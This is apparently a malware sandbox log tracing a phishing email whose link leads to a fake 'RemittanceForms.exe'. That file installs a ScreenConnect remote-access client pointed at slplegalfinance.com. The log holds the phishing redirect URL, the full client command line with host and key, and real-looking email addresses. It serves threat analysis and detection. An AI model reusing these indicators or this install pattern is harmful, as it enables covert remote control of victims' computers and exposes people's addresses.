                      Source: unknownNetwork traffic detected: HTTP traffic on port 57359 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57357 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 65451 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 65445 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57363 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 65454 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 65439 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 65442 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57360 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 65448 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 65431 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57342
                      Source: unknownNetwork traffic detected: HTTP traffic on port 65434 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57345
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57341
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 65453 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 65430 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57361 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57346
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57348
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57349 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57349
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57353
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57346 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57355
                      Source: unknownNetwork traffic detected: HTTP traffic on port 65433 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57356
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57350
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57351
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57358 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 65450 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57357
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57366 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57358
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57359
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57364
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57365
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57366
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57367
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57360
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57341 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57361
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57362
                      Source: unknownNetwork traffic detected: HTTP traffic on port 65436 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57363
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57355 -> 443
                      Source: unknownHTTPS traffic detected: 20.190.159.64:443 -> 192.168.2.16:49706 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49707 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 2.23.242.162:443 -> 192.168.2.16:49708 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 2.23.242.162:443 -> 192.168.2.16:49710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.190.159.64:443 -> 192.168.2.16:49711 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.242.39.171:443 -> 192.168.2.16:65430 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:65431 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:65432 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:65433 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:65440 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:65441 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.4.254:443 -> 192.168.2.16:65445 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.226.254:443 -> 192.168.2.16:65449 version: TLS 1.2

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\60deb4.msi
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipi
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{4D240DE6-1466-DE28-8702-C81DB1981C9B}
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE145.tmp
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE165.tmp
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE473.tmp
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\60deb6.msi
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\60deb6.msi
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{4D240DE6-1466-DE28-8702-C81DB1981C9B}
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{4D240DE6-1466-DE28-8702-C81DB1981C9B}\DefaultIcon
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipi
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2B41.tmp
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2C0D.tmp
                      Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Installer\wix{4D240DE6-1466-DE28-8702-C81DB1981C9B}.SchedServiceConfig.rmi
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\f3wa21dt.tmp
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\f3wa21dt.newcfg
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\tloof5fm.tmp
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\tloof5fm.newcfg
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\dldqviai.tmp
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\dldqviai.newcfg
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\f2x22ccr.tmp
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\f2x22ccr.newcfg
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\njifspve.tmp
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\njifspve.newcfg
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipi
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9B53.tmp
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9BB1.tmp
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\vd24ahbc.tmp
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\vd24ahbc.newcfg
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\owundbmf.tmp
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\owundbmf.newcfg
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\t2v4cln3.tmp
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\t2v4cln3.newcfg
                      Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIE165.tmp
                      Source: classification engineClassification label: mal84.evad.winEML@69/73@33/121
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
                      Source: C:\Windows\SysWOW64\rundll32.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1092:120:WilError_03
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20250116T1205530877-5980.etl
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                      Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                      Source: C:\Users\user\Downloads\RemittanceForms.exeFile read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\phish_alert_iocp_v1.4.48 - 2025-01-16T090409.755.eml"
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "53F80022-4EA9-497D-ADFC-B51F6B36E8C3" "55C219FA-EE3D-4DAB-B2D6-DD10726AC0B1" "5980" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://clicktime.cloud.postoffice.net/clicktime.php?U=https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwlk02n24rcdimfqv_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bahraincv.com/z63a2/6rr8dwuafolbxjbyml78hjrfslcaiy/alsco1171%40naver.com&E=tbirman%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=94a20af2634289455489b3afe132d21067e17954
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1972,i,9532732200185149555,16530467832849214428,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "53F80022-4EA9-497D-ADFC-B51F6B36E8C3" "55C219FA-EE3D-4DAB-B2D6-DD10726AC0B1" "5980" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5532 --field-trial-handle=1972,i,9532732200185149555,16530467832849214428,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://clicktime.cloud.postoffice.net/clicktime.php?U=https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwlk02n24rcdimfqv_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bahraincv.com/z63a2/6rr8dwuafolbxjbyml78hjrfslcaiy/alsco1171%40naver.com&E=tbirman%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=94a20af2634289455489b3afe132d21067e17954
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1972,i,9532732200185149555,16530467832849214428,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5532 --field-trial-handle=1972,i,9532732200185149555,16530467832849214428,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                      Source: unknownProcess created: C:\Users\user\Downloads\RemittanceForms.exe "C:\Users\user\Downloads\RemittanceForms.exe"
                      Source: unknownProcess created: C:\Users\user\Downloads\RemittanceForms.exe "C:\Users\user\Downloads\RemittanceForms.exe"
                      Source: C:\Users\user\Downloads\RemittanceForms.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"
                      Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 50CA2B6AF1D72CC80C4E11E477922C45 C
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSID5DB.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6346343 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 12F154F86D29205A07CD9883F3F7AAB3
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 658C20DC4570CE36B0E2CFA7882ABE33 E Global\MSI0000
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=slplegalfinance.com&p=443&s=0dff7030-637d-4802-a9cf-5f63d3c8abe9&k=BgIAAACkAABSU0ExAAgAAAEAAQDVyeZoBLn8WdM6xWDr4b0uAsUBfhP2EJOSdZugmbrUWVWehsUh2LvfCfwDYGcJBhcBEWS%2fDmahaCPw1tkv%2f%2bw18TIjThn%2bQ%2feZavwugcHDfdkaqKi0LnYdddcCsozuL7%2bVQevv9snFAHOiSjLD7xdNlPMSw%2bw682fIJIkr8XbdhPPukmg4Ksp6Kf1Xba7KkmNnwSS1MRXckDb%2f1hQrUI%2fSZZdGbJvZ3tc%2f3CR0LXLnGeCLG7Dt5iRIHwzJf5XuTInHiPesoO6bSk%2bUfoeCYO3BjvU6pRL6UKY08mjZ7e%2b6FOQb4acTm6QTR9K%2fsvFdvWQ%2br7EyKwXpSy6iTh4x7%2f%2bv&t=NewBuild"
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe" "RunRole" "d631616b-045d-46ad-b654-67b074b7884f" "User"
                      Source: C:\Users\user\Downloads\RemittanceForms.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 50CA2B6AF1D72CC80C4E11E477922C45 C
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 12F154F86D29205A07CD9883F3F7AAB3
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSID5DB.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6346343 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                      Source: unknownProcess created: C:\Users\user\Downloads\RemittanceForms.exe "C:\Users\user\Downloads\RemittanceForms.exe"
                      Source: unknownProcess created: C:\Users\user\Downloads\RemittanceForms.exe "C:\Users\user\Downloads\RemittanceForms.exe"
                      Source: C:\Users\user\Downloads\RemittanceForms.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 8C89C74C56A8241057E69ABE1029F40F C
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI20FD.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6365687 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding C1CF189F56AA756A7464B123F5466459
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
